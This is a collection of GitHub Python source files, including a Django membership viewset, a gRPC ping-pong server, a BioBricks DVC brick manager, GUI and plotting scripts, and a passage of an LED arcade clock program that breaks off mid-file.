'month__range','day__range', 'date__range', \n 'hour', 'minute', 'second', 'hour__range', 'minute__range', \n 'minute__range'], \n 'is_active': ['exact'], \n 'paid_out': ['exact'], \n 'is_finish': ['exact'],\n 'is_finish_date': ['exact'],\n 'is_cancel': ['exact'],\n 'is_renovation': ['exact']\n }\n \n filterset_class = MembershipFilter\n lookup_field = 'uuid'\n\n def get_serializer_class(self):\n if self.action == 'add_payment':\n return AddPaymentSerializer\n if self.action == 'create':\n return CreateSerializer\n if self.action == 'partial_update':\n return UpdateSerializer\n if self.action == 'list' or 'retrieve':\n return ListRetrieveMembershipModelSerializer\n\n @action(detail=True, methods=['post'])\n def add_payment(self, request, *args, **kwargs):\n membership = self.get_object()\n instaince_bank = BankAccount.objects.filter(id=request.data['bank']).first()\n\n Payment.objects.create(bank_account=instaince_bank, \n membership=membership, \n amount=request.data['amount'], \n method=request.data['method'],\n is_ticket=request.data['is_ticket'],\n is_invoice=request.data['is_invoice'])\n return Response('ok', status=status.HTTP_201_CREATED)\n\n","repo_name":"felipebarraza6/cowork-chillan-dev-stack","sub_path":"crm/memberships/views/memberships.py","file_name":"memberships.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41605284934","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport hyperclip\nfrom matplotlib import pyplot as plt\n\nn = 2\nm = 3\n\nnp.random.seed(29)\nhyperplanes = [hyperclip.Hyperplane().set_by_points(np.random.random((n,n))) for i_m in range(m)]\nnp.random.seed(None)\n\nX = np.random.random((10**6,n))\n\nid_pos_side = np.ones(X.shape[0])\nfor hyp in hyperplanes:\n id_pos_side = np.all((id_pos_side, hyp.side(X)), axis=0)\n\n# fig, axs = plt.subplots()\n# axs.set_aspect('equal', 'box')\n# plt.scatter(X[id_pos_side, 0], X[id_pos_side, 1], s=2, color='gray')\n\nfor hyp in hyperplanes:\n sol = hyp.compute_n_solutions()\n x_a, y_a, x_b, y_b = sol.flat\n \n a = (y_b-y_a)/(x_b-x_a)\n b = y_a - x_a * a\n \n y_0 = b\n y_1 = a * 1 + b\n \n # plt.plot([0, 1], [y_0, y_1])\n# plt.xlim([0,1])\n# plt.ylim([0,1])\n\nhc = hyperclip.Hyperclip().set_hyperplanes(hyperplanes)\n\n\nA = np.array([[-1., 1, 0],\n [ 0, 0, 1],\n [-1, -2, -1]]).T\nR = np.array([0.5, \n -0.5, \n 3])\n\nA = np.array([[0.25585178874659287],\n [0.022416578071991308]])\nR = np.array([2.5814930867384747])\n\nhc = hyperclip.Hyperclip(cython=True, verbose=1).set_A_R(A, R)\n\nfrom time import time\nst = time()\nvol = hc.volume()\net = time()\nprint('vol', vol, 'time', et-st)\n\n# st = time()\n# cond_A = hc._clipping_condition_A()\n# et = time()\n# print('A python', cond_A, et-st)\n\n# print('B cond', hyperclip.hyperfunc.clipping_condition_B_numpy(A, R))\n\n# st = time()\n# vol = hyperclip.hyperfunc.volume_numpy(A, R, check_A=True)\n# et = time()\n# print('vol cython', vol, et-st)\n\n# st = time()\n# vol = hc.volume()\n# et = time()\n# print('vol python', vol, et-st)\n\n# A = np.array([[-1],\n # [4.6*10**-310]])\n\n# hc.check()\n# vol = hc.volume()\n# print('10**6 MonteCarlo : ', id_pos_side.mean(), 'Hyperclip :', vol)\n\n# plt.text(0.25,0.2, \"10**6 MonteCarlo : \"+str(round(id_pos_side.mean(),4)))\n# plt.text(0.25,0.1, \"Hyperclip : \"+str(round(vol,4)))\n# plt.show()\n\n# A = np.array([[10,12.5,2.1],\n# [4,5.5,3.2],\n# [5.1,6.3,-5.4]])\n# # A = np.array([[1, 0, 2, -1],\n# # [3, 0, 0, 5],\n# # [2, 1, 4, -3],\n# # [1, 0, 5, 0]]).astype(np.double)\n# print(np.linalg.det(A))\n\n# hyperclip.hyperfunc.determinant_numpy(A)","repo_name":"fmazy/hyperclip","sub_path":"tests/test_2d_plot.py","file_name":"test_2d_plot.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70155797993","text":"import grpc\nimport pp_pb2, pp_pb2_grpc\nfrom concurrent import futures\nimport time\n\n\nclass Listener(pp_pb2_grpc.PPServiceServicer):\n\n def __init__(self):\n pass\n\n def ping(self, request, context):\n print(\"Received Ping, Sending Pong\")\n return pp_pb2.Pong(message=\"Pong\")\n\ndef serve():\n \"\"\"Main server function. Opens socket and listens for incoming grpc packets\"\"\"\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=1))\n pp_pb2_grpc.add_PPServiceServicer_to_server(Listener(), server)\n server.add_insecure_port(\"[::]:80\")\n server.start()\n try:\n while True:\n print(\"Running...\")\n time.sleep(10)\n except KeyboardInterrupt:\n print(\"Encountered KeyboardInterrupt, terminating.\")\n server.stop()\n\nif __name__ == \"__main__\":\n serve()\n","repo_name":"eldrad294/GRPC-Ping-Pong","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6718952006","text":"import cv2 as cv\nimport numpy as np\nfrom pathlib import Path\n\nfourcc = cv.VideoWriter_fourcc(*'DIVX')\nOut = cv.VideoWriter('UpscaledFile-DIVX.avi', fourcc, 24.0, (1020,1020),True)\nFrameLoc = Path(\"frames/VideoFrames-Upscaled\")\nFramNum = 1\nLastFrame = 240\nfor FramNum in range(1,LastFrame+1):\n\tFilePath = FrameLoc/(str(FramNum)+\".png\")\n\tOut.write(cv.imread(str(FilePath)))\nOut.release()\nprint(\"All Done!!\")","repo_name":"jawad-kp/FYP-SuperResolution","sub_path":"VideoMaker.py","file_name":"VideoMaker.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22633037735","text":"import subprocess, functools, os, re, datetime, json\nfrom subprocess import run, DEVNULL\nimport types, pyarrow.parquet as pq, re\nfrom pathlib import Path\nfrom .config import bblib, token\nfrom logger import logger\nimport os, urllib.request as request, functools, dvc.api\nfrom urllib.parse import urlparse\n\nfrom .checks import check_url_available, check_token, check_symlink_permission\n\nclass Brick:\n\n def __init__(self, remote, commit):\n self.remote = remote\n self.commit = commit\n \n @staticmethod\n def FromURL(url):\n \"\"\"Get the version of a brick from its git repo.\"\"\"\n remote, commit = url.split(\"#\")\n return Brick(remote, commit)\n\n @staticmethod\n def FromPath(path):\n \"\"\"Get the version of a brick from its git repo.\"\"\"\n bdir = bblib(path)\n gsys = functools.partial(subprocess.check_output, shell=True, cwd=bdir)\n commit = gsys(\"git rev-parse HEAD\").decode().strip()\n remote = gsys(\"git config --get remote.origin.url\").decode().strip()\n return Brick(remote, commit)\n\n @staticmethod\n def FromRemote(remote):\n \"\"\"Get the version of a brick from its git repo.\"\"\"\n try:\n logger.info(f\"getting latest version of {remote}\")\n commit = subprocess.check_output(f'git ls-remote \"{remote}\" HEAD', shell=True)\n commit = commit.decode().strip().split()[0]\n return Brick(remote, commit)\n except subprocess.CalledProcessError as e:\n logger.error(f\"failed to get latest version of {remote}: {e}\")\n logger.error(f\"is {remote} a valid git repository?\")\n return None\n\n @staticmethod\n def Resolve(ref, force_remote=False):\n \"\"\"find all bricks matching ref. `ref` can be:\n - existing name ie. 'tox21'\n - git-url syntax ie. 'https://github.com/biobricks-ai/tox21#commit'\n if `force_remote` is True then retrieve brick from remote repository\"\"\"\n # TODO this should resolve from the .bb directory when in a biobrick repo\n\n # if name matches remote#commit then resolve from url \n if re.match(\"^http.*[0-9a-f]{40}$\",ref):\n return Brick.FromURL(ref)\n \n # if name matches remote then resolve from remote\n if re.match(\"^http.*$\",ref):\n return Brick.FromRemote(ref)\n \n # otherwise resolve to https://github.com/biobricks-ai/\n remote = f\"https://github.com/biobricks-ai/{ref}\"\n\n if force_remote: \n return Brick.FromRemote(remote)\n\n # retrieve from library if it exists\n bricks = []\n bdir = bblib() / \"biobricks-ai\" / ref\n if bdir.exists():\n for bdir in (bblib() / \"biobricks-ai\" / ref).iterdir():\n logger.info(f\"checking {bdir.name} for {ref}\")\n # if the directory is a sha hash then add it to brick array\n if bdir.is_dir() and re.match(\"[0-9a-f]{40}$\",bdir.name):\n brick = Brick.FromPath(bdir)\n if remote == brick.remote:\n bricks.append(brick)\n \n # sort the bricks by their commit_date\n bricks.sort(key=lambda b: b.get_commit_date(), reverse=True)\n \n # pick the most recent one\n if len(bricks) > 0:\n return bricks[0]\n \n # if we can't find it in the library, then get the remote version\n return Brick.FromRemote(remote)\n\n\n def get_commit_date(self):\n \"\"\"get the date of the commit\"\"\"\n gsys = functools.partial(subprocess.check_output, shell=True, cwd=self.path())\n date = gsys(\"git show -s --format=%ci\").decode().strip()\n return datetime.datetime.strptime(date, \"%Y-%m-%d %H:%M:%S %z\")\n\n def url(self):\n return f\"{self.remote}#{self.commit}\"\n \n def urlpath(self):\n return Path(urlparse(self.url()).path[1:])\n\n def path(self):\n return bblib() / self.urlpath() / self.commit\n\n def _relpath(self):\n \"get the path to this brick relative to bblib\"\n return self.urlpath() / self.commit\n\n def install(self):\n \"install this brick\"\n logger.info(f\"running checks on brick\")\n check_url_available(self.remote)\n check_token(token())\n check_symlink_permission()\n\n if bblib(self.commit).exists():\n logger.info(f\"\\033[91m{self.url}\\033[0m already exists in BioBricks library.\")\n return True\n\n cmd = functools.partial(run,shell=True,stdout=DEVNULL,stderr=DEVNULL)\n \n # old way - cmd(f\"git submodule add {self.remote} {self.repo}\",cwd=bblib())\n logger.info(f\"git clone {self.remote} {self._relpath()} in {bblib()}\")\n cmd(f\"git clone {self.remote} {self._relpath()}\", cwd = bblib())\n cmd(f\"git checkout {self.commit}\", cwd = self.path())\n\n logger.info(f\"adding brick to dvc cache\")\n rsys = functools.partial(cmd,cwd=self.path())\n rsys(f\"dvc cache dir {bblib() / 'cache'}\")\n rsys(\"dvc config cache.shared group\")\n rsys(\"dvc config cache.type symlink\")\n\n # SET UP BIOBRICKS.AI DVC REMOTE WITH AUTH\n logger.info(f\"setting up credentials for dvc.biobricks.ai\")\n rsys(\"dvc remote add -f biobricks.ai https://dvc.biobricks.ai\")\n rsys(\"dvc remote modify --local biobricks.ai auth custom\")\n rsys(\"dvc remote modify --local biobricks.ai custom_auth_header BBToken\")\n rsys(\"dvc remote modify --local biobricks.ai read_timeout 300\")\n rsys(\"dvc remote modify --local biobricks.ai connect_timeout 300\")\n\n rsys(f\"dvc remote modify --local biobricks.ai password {token()}\")\n\n logger.info(f\"discovering brick assets dvc.biobricks.ai\")\n fs = dvc.api.DVCFileSystem(self.path())\n paths = fs.find(\"data\",maxdepth=1) + fs.find(\"brick\",maxdepth=1)\n parquet_paths = [x for x in paths if x.endswith('.parquet')]\n\n logger.info(f\"pulling brick assets\")\n run(f\"dvc pull {' '.join(parquet_paths)}\", cwd=self.path(), shell=True)\n \n logger.info(f\"\\033[94m{self.url()}\\033[0m succesfully downloaded to BioBricks library.\")\n return self\n \n def load(self):\n \"load this brick\"\n bdir = self.path()\n if not bdir.exists(): \n raise Exception(f\"no path '{bdir}' try `biobricks install {self.url()}`\")\n \n def dirns(dir: Path):\n filter = lambda d: d.name.endswith('.parquet')\n paths = [d for d in dir.rglob('*') if filter(d)]\n namespace = types.SimpleNamespace()\n pkey = lambda p: re.sub(r'[.-]','_',p)\n for p in paths:\n path = p.relative_to(dir)\n logger.info(f\"loading {path}...\")\n current = namespace\n for part in path.parts:\n key = pkey(part)\n if not hasattr(current, key) and part.endswith('.parquet'):\n setattr(current, key[:-8], pq.ParquetDataset(str(p)))\n elif not hasattr(current, key):\n setattr(current, key, types.SimpleNamespace())\n current = getattr(current, key)\n elif hasattr(current, key):\n current = getattr(current, key)\n logger.info(f\"loaded {len(paths)} tables from {dir}\")\n return namespace\n\n ns1 = dirns(bdir / 'data')\n ns2 = dirns(bdir / 'brick')\n result = {**ns2.__dict__, **ns1.__dict__}\n return types.SimpleNamespace(**result)\n \n def assets(self):\n \"get the assets for this brick\"\n bdir = self.path()\n if not bdir.exists(): \n raise Exception(f\"no path '{bdir}' try `biobricks install {self.url()}`\")\n \n def find_parquet_files(directory):\n if not directory.exists():\n return []\n for entry in os.scandir(directory):\n if entry.name.endswith('.parquet'):\n yield entry.path\n elif entry.is_dir():\n yield from find_parquet_files(entry.path)\n \n return list(find_parquet_files(bdir / 'data')) + list(find_parquet_files(bdir / 'brick'))\n \n def uninstall(self):\n \"uninstall this brick\"\n os.rmdir(self.path())\n ","repo_name":"AlxanderNeils/biobricks","sub_path":"biobricks/brick.py","file_name":"brick.py","file_ext":"py","file_size_in_byte":8349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"41691886980","text":"import PySimpleGUI as sg\n\nlayout = [\n [sg.Text(\"Informe o valor em reais:\")],\n [sg.InputText(key=\"valor\")],\n [sg.Button(\"Decompor\"),sg.Button(\"Cancelar\")],\n [sg.Text(\"Aqui será mostrado as notas de 100\",key=\"n100\")],\n [sg.Text(\"Aqui será mostrado as notas de 50\",key=\"n50\")], \n [sg.Text(\"Aqui será mostrado as notas de 20\",key=\"n20\")],\n [sg.Text(\"Aqui será mostrado as notas de 10\",key=\"n10\")],\n [sg.Text(\"Aqui será mostrado as notas de 5\",key=\"n5\")],\n [sg.Text(\"Aqui será mostrado as notas de 2\",key=\"n2\")],\n [sg.Text(\"Aqui será mostrado as notas de 1\",key=\"n1\")],\n]\n\njanela = sg.Window(\"Decomposição de Notas\",layout)\n\nwhile True:\n evento, valores = janela.read()\n if evento == sg.WIN_CLOSED or evento == \"Cancelar\":\n print(\"A janela foi fechada\")\n break\n if evento == \"Decompor\":\n print(\"Cálculo Realizado\")\n valor = int(valores[\"valor\"])\n notas100 = valor // 100\n resto50 = valor % 100\n notas50 = resto50 // 50\n resto20 = resto50 % 50\n notas20 = resto20 // 20\n resto10 = resto20 % 20\n notas10 = resto10 // 10\n resto5 = resto10 % 10\n notas5 = resto5 // 5\n resto2 = resto5 % 5\n notas2 = resto2 // 2\n resto1 = resto2 % 2\n notas1 = resto1 // 1\n janela[\"n100\"].update(f\"Notas 100: {notas100}\")\n janela[\"n50\"].update(f\"Notas 50: {notas50}\")\n janela[\"n20\"].update(f\"Notas 20: {notas20}\")\n janela[\"n10\"].update(f\"Notas 10: {notas10}\")\n janela[\"n5\"].update(f\"Notas 5: {notas5}\")\n janela[\"n2\"].update(f\"Notas 2: {notas2}\")\n janela[\"n1\"].update(f\"Notas 1: {notas1}\")\n\njanela.close()","repo_name":"Migvalentini/PythonProgramacao","sub_path":"PY 06-23 GUI Ex3.py","file_name":"PY 06-23 GUI Ex3.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18907947253","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 31 16:59:01 2022\n\n@author: alsjur\n\"\"\"\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cartopy.crs as ccrs\nimport json\n\n\nimport sys\nsys.path.insert(0, '/home/alsjur/nird/energy-transfer/analysis')\nfrom LLC2A4 import readROMSfile, LLC2A4\n\nfigdir = '/home/alsjur/nird/figures_temp/'\n\nfontsize = 12\n\nA4grid = readROMSfile('/home/alsjur/PhD/Data/test_data/A4/'+'ocean_avg_1827.nc')\nLLCgrid = xr.open_dataset('/home/alsjur/PhD/Data/test_data/LLC2160/'+'LLC2160_grid.nc')\n\n# read transect defininitions from file\nwith open('/home/alsjur/nird/energy-transfer/data/LLCregions.txt') as f:\n data = f.read()\n LLCtransects = json.loads(data)\n\nA4transects = {}\n\nfor name, data in LLCtransects.items():\n LLCistart = data['idx_start']\n LLCistop = data['idx_stop']\n LLCjstart = data['idy_start']\n LLCjstop = data['idy_stop']\n \n A4istart, A4jstart = LLC2A4([LLCistart, LLCjstart], A4grid, LLCgrid)\n A4istop, A4jstop = LLC2A4([LLCistop, LLCjstop], A4grid, LLCgrid)\n \n A4transects[name] = {\n 'istart' : A4istart,\n 'istop' : A4istop,\n 'jstart' : A4jstart,\n 'jstop' : A4jstop,\n 'nr' : data['nr']\n }\n\n\nbath = A4grid.h\n\n\n# projection used for plotting\nprojection = ccrs.NearsidePerspective(central_longitude=-30\n , central_latitude=70.0\n #, satellite_height = 5E6\n )\n\nfig = plt.figure(constrained_layout=True, figsize=(15,10))\ngs = fig.add_gridspec(1,2)\n\naxd = {}\n\naxd['map'] = fig.add_subplot(gs[0], projection=projection)\naxd['idmap'] = fig.add_subplot(gs[1])\n\nvmin = 0\nvmax = bath.max()\n\n# plot map\ncm = axd['map'].contourf(bath.lon_rho, bath.lat_rho, bath.where(bath.lon_rho>0)\n ,transform=ccrs.PlateCarree()\n ,cmap='Blues'\n ,vmin=vmin\n ,vmax=vmax\n #,zorder=5\n )\naxd['map'].contourf(bath.lon_rho, bath.lat_rho, bath.where(bath.lon_rho<0)\n ,transform=ccrs.PlateCarree()\n ,cmap='Blues'\n ,vmin=vmin\n ,vmax=vmax\n #,zorder=1\n )\n\n# aestethics\n#ax.gridlines(color='gray', linestyle='--')\naxd['map'].coastlines()\n#axd['map'].gridlines()\naxd['map'].set_extent([-180, 180, 50, 90], crs=ccrs.PlateCarree())\n\n# remove spines\n#ax.outline_patch.set_visible(False)\naxd['map'].spines['geo'].set_visible(False)\n\n# plot index map\naxd['idmap'].pcolormesh(bath.i, bath.j, bath\n ,cmap='Blues'\n ,vmin=vmin\n ,vmax=vmax\n ,shading='auto'\n )\naxd['idmap'].set_aspect('equal')\n\ndef plot_region(bath, axd, istart, istop, jstart, jstop, nr):\n idxs = [istart, istop, istop, istart, istart]\n idys = [jstart, jstart, jstop, jstop, jstart]\n \n axd['idmap'].plot(idxs, idys\n , color='red'\n , lw=2\n )\n \n axd['idmap'].text((istart+istop)/2, (jstart+jstop)/2, f'{nr}'\n , color = 'red'\n , fontsize = fontsize\n , va = 'center'\n , ha = 'center'\n )\n \n\n lon0 = float(bath.lon_rho.isel(i=istart,j=jstart).values)\n lat0 = float(bath.lat_rho.isel(i=istart,j=jstart).values)\n \n lon1 = float(bath.lon_rho.isel(i=istop,j=jstart).values)\n lat1 = float(bath.lat_rho.isel(i=istop,j=jstart).values)\n \n lon2 = float(bath.lon_rho.isel(i=istop,j=jstop).values)\n lat2 = float(bath.lat_rho.isel(i=istop,j=jstop).values)\n \n lon3 = float(bath.lon_rho.isel(i=istart,j=jstop).values)\n lat3 = float(bath.lat_rho.isel(i=istart,j=jstop).values)\n \n #fix strange behavior when crossing from lon -180 to lon 180\n if lon0*lon2 < 0 and lon2 < -90:\n if lon0 < 0:\n lon0 += 360\n if lon1 < 0:\n lon1 += 360\n if lon2 < 0:\n lon2 += 360\n if lon3 < 0:\n lon3 += 360\n \n lons = [lon0, lon1, lon2, lon3, lon0]\n lats = [lat0, lat1, lat2, lat3, lat0]\n \n\n axd['map'].plot(lons, lats\n , color='red'\n , lw=2\n , transform=ccrs.PlateCarree()\n )\n \n axd['map'].text((lon0+lon1+lon2+lon3)/4, (lat0+lat1+lat2+lat3)/4, f'{nr}'\n , color = 'red'\n , fontsize = fontsize\n , transform=ccrs.PlateCarree()\n , va = 'center'\n , ha = 'center'\n )\n\nfor transect, info in A4transects.items():\n istart = info['istart']\n istop = info['istop']\n jstart = info['jstart']\n jstop = info['jstop']\n nr = info['nr']\n \n plot_region(bath, axd, istart, istop, jstart, jstop, nr) \n\nfig.savefig(figdir+'A4regions.png')\n\n","repo_name":"alpsjur/energy-transfer","sub_path":"ploting/A4_plot_regions_map.py","file_name":"A4_plot_regions_map.py","file_ext":"py","file_size_in_byte":4947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17532695695","text":"#!/usr/bin/env python\n\n\"\"\"\nArcade clock for Spectro.\n\"\"\"\n\n# Gets code to pass both pylint & pylint3:\n# pylint: disable=bad-option-value, useless-object-inheritance\n\nimport time\nfrom PIL import Image, ImageDraw\nfrom spectrobase import SpectroBase\n\nTWELVE_HOUR = True\nEURO_DATE = False\n\n# Each item in this list is a 4-tuple containing X, Y, width and height of\n# sprite data within the sprite sheet image. Some of the sprite elements\n# might overlap or get recycled (e.g. the dot image is just one pixel of the\n# colon image) because this was adapted from an Arduino project and the\n# space constraints there were insane.\nSPRITE_COORDS = [\n (0, 16, 3, 5), (3, 16, 3, 5), (6, 16, 3, 5), (9, 16, 3, 5), # Digits 0-3\n (12, 16, 3, 5), (15, 16, 3, 5), (18, 16, 3, 5), # Digits 4-6\n (21, 16, 3, 5), (24, 16, 3, 5), (27, 16, 3, 5), # Digits 7-9\n (30, 17, 1, 3), # Colon (between HH:MM:SS)\n (30, 17, 1, 1), # Dot (between MM.DD.YY)\n (0, 38, 9, 9), (8, 46, 9, 9), (8, 54, 9, 9), # Outline for mouth\n (8, 62, 9, 9), (8, 54, 9, 9), (8, 46, 9, 9), # moving right (6 frames)\n (0, 38, 9, 9), (0, 29, 9, 9), (8, 29, 9, 9), # Outline for mouth\n (16, 29, 9, 9), (8, 29, 9, 9), (0, 29, 9, 9), # moving down (6 frames)\n (0, 38, 9, 9), (0, 46, 9, 9), (0, 54, 9, 9), # Outline for mouth\n (0, 62, 9, 9), (0, 54, 9, 9), (0, 46, 9, 9), # moving left (6 frames)\n (0, 38, 9, 9), (0, 21, 9, 9), (8, 21, 9, 9), # Outline for mouth\n (16, 21, 9, 9), (8, 21, 9, 9), (0, 21, 9, 9), # moving up (6 frames)\n (17, 40, 7, 7), (23, 46, 7, 7), (23, 52, 7, 7), # Mouth moving right\n (23, 59, 7, 7), (23, 52, 7, 7), (23, 46, 7, 7), # (6 frames)\n (17, 40, 7, 7), (0, 77, 7, 7), (6, 77, 7, 7), # Mouth moving down\n (13, 77, 7, 7), (6, 77, 7, 7), (0, 77, 7, 7), # (6 frames)\n (17, 40, 7, 7), (17, 46, 7, 7), (17, 52, 7, 7), # Mouth moving left\n (17, 59, 7, 9), (17, 52, 7, 7), (17, 46, 7, 7), # (6 frames)\n (17, 40, 7, 7), (0, 71, 7, 7), (6, 71, 7, 7), # Mouth moving up\n (13, 71, 7, 7), (6, 71, 7, 7), (0, 71, 7, 7), # (6 frames)\n (23, 66, 9, 9), (23, 75, 9, 9), # Ghost outline (2 frames)\n (25, 21, 7, 7), (25, 28, 7, 7), # Ghost (2 frames)\n (26, 38, 5, 3), (26, 42, 5, 3), # Ghost eyes (right, down)\n (26, 36, 5, 3), (26, 41, 5, 3), # Ghost eyes (left, up)\n (0, 0, 32, 16), # Playfield\n]\n\nSPRITE_COORDS_LARGE = [\n (0, 33, 7, 11), (8, 33, 7, 11), (16, 33, 7, 11), # Digits 0-2\n (24, 33, 7, 11), (32, 33, 7, 11), (40, 33, 7, 11), # Digits 3-5\n (48, 33, 7, 11), (56, 33, 7, 11), (64, 33, 7, 11), # Digits 6-8\n (72, 33, 7, 11), # 9\n (48, 45, 2, 5), # Colon (between HH:MM:SS)\n (48, 45, 2, 2), # Dot (between MM.DD.YY)\n (78, 15, 15, 15), (32, 45, 15, 15), (16, 45, 15, 15), # Outline for mouth\n (0, 45, 15, 15), (16, 45, 15, 15), (32, 45, 15, 15), # moving right (6)\n (78, 15, 15, 15), (32, 61, 15, 15), (16, 61, 15, 15), # Outline for mouth\n (0, 61, 15, 15), (16, 61, 15, 15), (32, 61, 15, 15), # moving down (6)\n (78, 15, 15, 15), (32, 77, 15, 15), (16, 77, 15, 15), # Outline for mouth\n (0, 77, 15, 15), (16, 77, 15, 15), (32, 77, 15, 15), # moving left (6)\n (78, 15, 15, 15), (32, 93, 15, 15), (16, 93, 15, 15), # Outline for mouth\n (0, 93, 15, 15), (16, 93, 15, 15), (32, 93, 15, 15), # moving up (6)\n (80, 31, 13, 13), (80, 45, 13, 13), (66, 45, 13, 13), # Mouth moving right\n (52, 45, 13, 13), (66, 45, 13, 13), (80, 45, 13, 13), # (6 frames)\n (80, 31, 13, 13), (80, 59, 13, 13), (66, 59, 13, 13), # Mouth moving down\n (52, 59, 13, 13), (66, 59, 13, 13), (80, 59, 13, 13), # (6 frames)\n (80, 31, 13, 13), (80, 73, 13, 13), (66, 73, 13, 13), # Mouth moving left\n (52, 73, 13, 13), (66, 73, 13, 13), (80, 73, 13, 13), # (6 frames)\n (80, 31, 13, 13), (80, 87, 13, 13), (66, 87, 13, 13), # Mouth moving up\n (52, 87, 13, 13), (66, 87, 13, 13), (80, 87, 13, 13), # (6 frames)\n (62, 101, 15, 15), (78, 101, 15, 15), # Ghost outline (2)\n (66, 0, 13, 13), (80, 0, 13, 13), # Ghost (2 frames)\n (66, 14, 9, 5), # Ghost eyes\n (67, 20, 7, 2), # Ghost pupils\n (0, 0, 64, 32), # Playfield = 66\n]\n\ndef orient_small(frac):\n \"\"\"Given a fractional value (0.0 to 1.0), determine the corresponding\n pixel index around the perimeter of the maze (there are 68 distinct\n viable pixel positions around the 32x16 image).\"\"\"\n pixel = int(frac * 68)\n if pixel < 25:\n x_pos = pixel\n y_pos = 0\n direction = 0 # Right\n elif pixel < 34:\n x_pos = 25\n y_pos = pixel - 25\n direction = 1 # Down\n elif pixel < 59:\n x_pos = 58 - pixel\n y_pos = 9\n direction = 2 # Left\n else:\n x_pos = 0\n y_pos = 67 - pixel\n direction = 3 # Up\n return x_pos, y_pos, direction\n\ndef orient_large(frac):\n \"\"\"Given a fractional value (0.0 to 1.0), determine the corresponding\n pixel index around the perimeter of the maze (there are 136 distinct\n viable pixel positions around the 64x32 image).\"\"\"\n# 50 across, 18 high\n pixel = int(frac * 136)\n if pixel < 50:\n x_pos = pixel + 1\n y_pos = 1\n direction = 0 # Right\n elif pixel < 68:\n x_pos = 50\n y_pos = pixel - 49\n direction = 1 # Down\n elif pixel < 118:\n x_pos = 118 - pixel\n y_pos = 18\n direction = 2 # Left\n else:\n x_pos = 1\n y_pos = 136 - pixel\n direction = 3 # Up\n return x_pos, y_pos, direction\n\nclass Sprite(object):\n \"\"\"Movable graphics entities. These don't themselves contain bitmap data,\n but have an index into the main applications sprite_data[] array.\"\"\"\n def __init__(self, image_index, x_pos, y_pos, color):\n self.image_index = image_index\n self.x_pos = x_pos\n self.y_pos = y_pos\n self.color = color\n self.brightness = 1.0\n self.off_time = -100.0\n\n def reframe(self, idx, x_pos, y_pos):\n \"\"\"Assign a new image index and (X,Y) position to a Sprite.\"\"\"\n self.image_index = idx\n self.x_pos = x_pos\n self.y_pos = y_pos\n\n def adjusted_brightness(self):\n \"\"\"Return a Sprite's color with its current brightness applied.\"\"\"\n brightness = self.brightness ** 0.8\n return (int(self.color[0] * brightness),\n int(self.color[1] * brightness),\n int(self.color[2] * brightness))\n\nclass ArcadeClock(SpectroBase):\n \"\"\"Arcade clock for Spectro.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ArcadeClock, self).__init__(*args, **kwargs)\n\n self.sprite_data = None\n self.sprite_list = None\n self.sprite_coords_list = None\n self.current_time = 0\n self.image = None\n self.draw = None\n\n def set_two_digits(self, first_sprite, value):\n \"\"\"Set the image indices for two adjacent Sprites, used for\n assigning two-digit numbers (e.g. HH, MM, SS, etc.).\"\"\"\n self.sprite_list[first_sprite].image_index = value // 10\n self.sprite_list[first_sprite + 1].image_index = value % 10\n\n def draw_mouth_small(self):\n \"\"\"Animate mouth around small (32x16) maze.\"\"\"\n frac = (self.current_time % 3.5) / 3.5 # 3.5 seconds per lap\n x_pos, y_pos, direction = orient_small(frac)\n frame = int((self.current_time % 0.3) * 20.0) # 0 to 5\n self.sprite_list[17].reframe(12 + direction * 6 + frame,\n x_pos - 1, y_pos - 1)\n self.sprite_list[19].reframe(36 + direction * 6 + frame,\n x_pos, y_pos)\n return frac, x_pos, y_pos\n\n def draw_mouth_large(self):\n \"\"\"Animate mouth around large (64x32) maze.\"\"\"\n frac = (self.current_time % 3.5) / 3.5 # 3.5 seconds per lap\n x_pos, y_pos, direction = orient_large(frac)\n frame = int((self.current_time % 0.3) * 20.0) # 0 to 5\n self.sprite_list[17].reframe(12 + direction * 6 + frame,\n x_pos - 1, y_pos - 1)\n self.sprite_list[19].reframe(36 + direction * 6 + frame,\n x_pos, y_pos)\n return frac, x_pos, y_pos\n\n def draw_ghost_small(self, frac):\n \"\"\"Animate ghost around small (32x16) maze.\"\"\"\n # Make ghost follow mouth, slightly behind\n x_pos, y_pos, direction = orient_small((frac - 0.18) % 1.0)\n frame = int((self.current_time % 1.0) * 2.0)\n self.sprite_list[18].reframe(60 + frame, x_pos - 1, y_pos - 1)\n self.sprite_list[20].reframe(62 + frame, x_pos, y_pos)\n self.sprite_list[21].reframe(64 + direction, x_pos + 1, y_pos + 1)\n\n def draw_ghost_large(self, frac):\n \"\"\"Animate ghost around large (64x32) maze.\"\"\"\n # Make ghost follow mouth, slightly behind\n x_pos, y_pos, direction = orient_large((frac - 0.15) % 1.0)\n frame = int((self.current_time % 1.0) * 2.0)\n self.sprite_list[18].reframe(60 + frame, x_pos - 1, y_pos - 1)\n self.sprite_list[20].reframe(62 + frame, x_pos, y_pos)\n eye_offset = [(3, 3), (2, 4), (1, 3), (2, 2)]\n pupil_offset = [(5, 5), (3, 7), (1, 5), (3, 2)]\n self.sprite_list[21].reframe(64, x_pos + eye_offset[direction][0],\n y_pos + eye_offset[direction][1])\n self.sprite_list[22].reframe(65, x_pos + pupil_offset[direction][0],\n y_pos + pupil_offset[direction][1])\n\n def eat_digits(self, x_pos, y_pos, offset, dist):\n \"\"\"Make the mouth \"eat\" clock 